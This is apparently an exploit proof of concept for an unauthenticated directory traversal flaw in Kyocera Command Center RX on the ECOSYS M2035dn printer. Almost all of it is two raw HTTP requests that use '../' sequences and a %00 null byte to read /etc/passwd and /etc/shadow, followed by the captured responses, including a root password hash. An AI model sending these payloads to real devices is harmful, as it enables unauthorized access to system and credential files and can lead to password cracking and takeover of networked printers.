# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) # Author: Luis Martinez # Discovery Date: 2022-02-10 # Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html # Tested Version: ECOSYS M2035dn # Tested on: Linux # Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated) # Proof of Concept: # 1.- Create a directory traversal payload # 2.- Add nullbyte to the end of the payload(%00) # 3.- Sent your request Request 1: GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1 Cookie: rtl=0 Host: X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 1: HTTP/1.1 200 OK Content-Length: 844 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 15:55:57 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh adm:x:4:4:adm:/var/adm:/bin/sh lp:x:5:7:lp:/var/spool/lpd:/bin/sh sync:x:6:8:sync:/bin:/bin/sync shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown halt:x:8:10:halt:/sbin:/sbin/halt mail:x:9:11:mail:/var/mail:/bin/sh news:x:10:12:news:/var/spool/news:/bin/sh uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh operator:x:12:0:operator:/root:/bin/sh games:x:13:60:games:/usr/games:/bin/sh ftp:x:15:14:ftp:/var/ftp:/bin/sh man:x:16:20:man:/var/cache/man:/bin/sh www:x:17:18:www-data:/var/www:/bin/sh sshd:x:18:19:sshd:/var/run/sshd:/bin/sh proxy:x:19:21:proxy:/bin:/bin/sh telnetd:x:20:22:proxy:/bin:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh ais:x:101:101:ais:/var/run/ais:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Request 2: GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1 Cookie: rtl=0 Host: X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 2: HTTP/1.1 200 OK Content-Length: 480 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 16:10:16 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873:::::: bin:*:15873:::::: daemon:*:15873:::::: sys:*:15873:::::: adm:*:15873:::::: lp:*:15873:::::: sync:*:15873:::::: shutdown:*:15873:::::: halt:*:15873:::::: mail:*:15873:::::: news:*:15873:::::: uucp:*:15873:::::: operator:*:15873:::::: games:*:15873:::::: ftp:*:15873:::::: man:*:15873:::::: www:*:15873:::::: sshd:*:15873:::::: proxy:*:15873:::::: telnetd:*:15873:::::: backup:*:15873:::::: ais:*:15873:::::: nobody:*:15873::::::